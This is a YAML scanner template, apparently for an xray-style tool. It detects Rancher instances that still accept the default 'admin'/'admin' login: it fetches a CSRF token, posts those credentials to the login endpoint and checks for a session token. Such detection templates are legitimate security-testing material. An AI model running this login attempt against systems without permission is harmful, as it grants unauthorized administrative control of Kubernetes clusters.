id: rancher-default-password

info:
  name: Rancher Default Login
  author: princechaddha
  severity: high
  verified: false
  description: |
    Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
    app="RANCHER-容器管理"
  reference: 
    - https://github.com/rancher/rancher

rules:
  r0:
    request:
      method: GET
      path: /v3/settings/first-login
    expression: response.status == 200 && response.headers["set-cookie"].contains('CSRF=')
    output:
      search: '"Set-Cookie: CSRF=(?P<csrf>.*?)([\s|;])".bsubmatch(response.raw_header)'
      csrf: search["csrf"]
  r1:
    request:
      method: POST
      path: /v3-public/localProviders/local?action=login
      headers:
        Cookie: CSRF={{csrf}}
        X-Api-Csrf: "{{csrf}}"
      body: |
        {"username":"admin","password":"admin","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}}
    expression: response.status == 200 && response.raw_header.bcontains(b'R_SESS=token')
expression: r0() && r1()
